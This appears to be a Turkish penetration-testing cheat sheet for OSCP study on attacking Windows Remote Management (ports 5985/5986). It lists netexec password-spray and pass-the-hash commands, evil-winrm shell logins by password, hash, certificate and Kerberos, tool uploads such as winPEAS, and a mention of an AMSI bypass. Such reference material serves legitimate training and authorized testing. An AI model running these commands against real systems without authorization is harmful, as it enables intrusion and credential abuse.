FOOTHOLD Metodoloji Cheat-sheet
5985

WinRM (Windows Remote Management — HTTP 5985 / HTTPS 5986)

windows

5985/5986 WinRM enumeration ve exploitation: netexec winrm, evil-winrm (parola + -H hash PtH + PKINIT/sertifika), HTTPS 5986 ve dosya transferi.

┌──

Komutlar

nmap ✓ EXAM-SAFE
nmap -p5985,5986 -sV {{RHOST}} -oN winrm_enum.txt
WinRM HTTP (5985) / HTTPS (5986) portlarini ve servis bilgisini tespit eder. HackTricks — Pentesting WinRM
netexec ✓ EXAM-SAFE
netexec winrm {{RHOST}} -u {{USER}} -p {{PASS}}
WinRM kredensiyal dogrulama; '(Pwn3d!)' ciktisi evil-winrm shell hakkini gosterir. NetExec Wiki — WinRM Protocol
netexec ✓ EXAM-SAFE
netexec winrm {{RHOST}} -u {{USER}} -H {{NTHASH}}
NTLM hash ile WinRM Pass-the-Hash dogrulama. NetExec Wiki — WinRM Protocol
netexec ✓ EXAM-SAFE
netexec winrm {{RHOST}} -u {{WORDLIST}} -p {{PASS}} --continue-on-success
User listesi ile WinRM password spray; tek parola - cok kullanici. NetExec Wiki — WinRM Protocol
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}}
Parola ile interaktif WinRM PowerShell shell. Evil-WinRM GitHub
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}}
Pass-the-Hash ile WinRM shell; parola yerine NT hash kullanilir. Evil-WinRM GitHub
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -S
HTTPS WinRM (5986) uzerinden shell; -S SSL kullanir (self-signed icin ek ayar gerekebilir). Evil-WinRM GitHub
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -c cert.pem -k priv.key -S -u {{USER}}
Sertifika tabanli (PKINIT/ADCS) WinRM auth; ESC8/ADCS sonrasi cikartilan cert+key ile login. Evil-WinRM GitHub
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -s /opt/scripts/ -e /opt/exes/
Shell icinde -s ile PowerShell script (Invoke-X), -e ile exe yukleme yollari tanimlar. Evil-WinRM GitHub
evil-winrm ✓ EXAM-SAFE user
upload /home/kali/winPEASx64.exe C:\\Users\\Public\\winpeas.exe
Evil-WinRM shell icinde dosya yukleme (download da var); winPEAS gibi araclari aktarir. Evil-WinRM GitHub
impacket-getTGT ✓ EXAM-SAFE user
impacket-getTGT {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} && KRB5CCNAME={{USER}}.ccache evil-winrm -i {{DC_HOST}} -u {{USER}} -r {{DOMAIN}}
Kerberos TGT alip ccache ile evil-winrm -r (realm) uzerinden Kerberos auth WinRM shell. HackTricks — Pentesting WinRM (Kerberos)

WinRM (5985/5986) Genel Bakis

WinRM, Windows’un uzaktan yonetim servisidir; 5985 = HTTP, 5986 = HTTPS. OSCP’de cok kritiktir cunku gecerli bir kredensiyal (ozellikle Remote Management Users veya local admin grubu uyesi) WinRM acikken dogrudan interaktif shell verir — evil-winrm ile.

Enumeration

  • nmap -p5985,5986 ile portlari teyit edin; 5985 acik fakat shell alamiyorsaniz kullanici Remote Management Users grubunda olmayabilir.
  • netexec winrm ile kredensiyalleri dogrulayin. Cikti (Pwn3d!) ise o user ile evil-winrm shell alabilirsiniz; sadece [+] ise auth gecerli ama remote-shell yetkisi yok olabilir.
  • Password spray icin --continue-on-success ve user wordlist kullanin (lockout’a dikkat).

Kimlik Dogrulama Yontemleri

  • Parola: evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}}.
  • Pass-the-Hash: -H {{NTHASH}} — NTLM hash ile parola olmadan. Hash’i Responder/secretsdump/mimikatz’tan elde edersiniz.
  • HTTPS (5986): -S bayragi ile SSL. Self-signed sertifika sorununda evil-winrm genelde dogrudan kabul eder.
  • Sertifika / PKINIT (ADCS): ESC1/ESC8 gibi ADCS saldirilarindan elde edilen cert.pem + priv.key ile -c/-k kullanarak login.
  • Kerberos: impacket-getTGT ile TGT alip KRB5CCNAME set edip evil-winrm -r {{DOMAIN}} ile Kerberos authentication.

Exploitation / Post

Shell aldiktan sonra:

  • -s (PowerShell script dizini) ve -e (exe dizini) bayraklari ile yerel araclari (winPEAS, PowerView, Invoke-*) shell’e kolayca enjekte edin.
  • Shell ici upload/download komutlari ile dosya transferi yapin — ayri bir SMB/HTTP server kurmaya gerek kalmadan.
  • whoami /priv, whoami /all ile yetkileri (SeImpersonate vb.) kontrol edip local privesc’e gecin.

Notlar

  • Evil-WinRM, AMSI nedeniyle bazi script’leri engelleyebilir; Bypass-4MSI shell-ici komutu mevcuttur (savunma/egitim baglaminda OSCP-safe).
  • 5985 kapali ama 5986 acik senaryolarda mutlaka -S deneyin.
┌──

İlgili teknikler

Evil-WinRM: WinRM Üzerinden İnteraktif Shell, PtH ve Dosya TransferiImpacket Suite: PsExec/WMIExec/SMBExec, Secretsdump, Kerberos Saldirilari ve NTLM RelaySaklanan Kimlik Bilgileri — cmdkey, Unattend, GPP, Credential Manager, SAM
┌──

Kaynaklar

↗ HackTricks — Pentesting WinRM↗ Evil-WinRM GitHub↗ NetExec Wiki — WinRM Protocol
0/15 set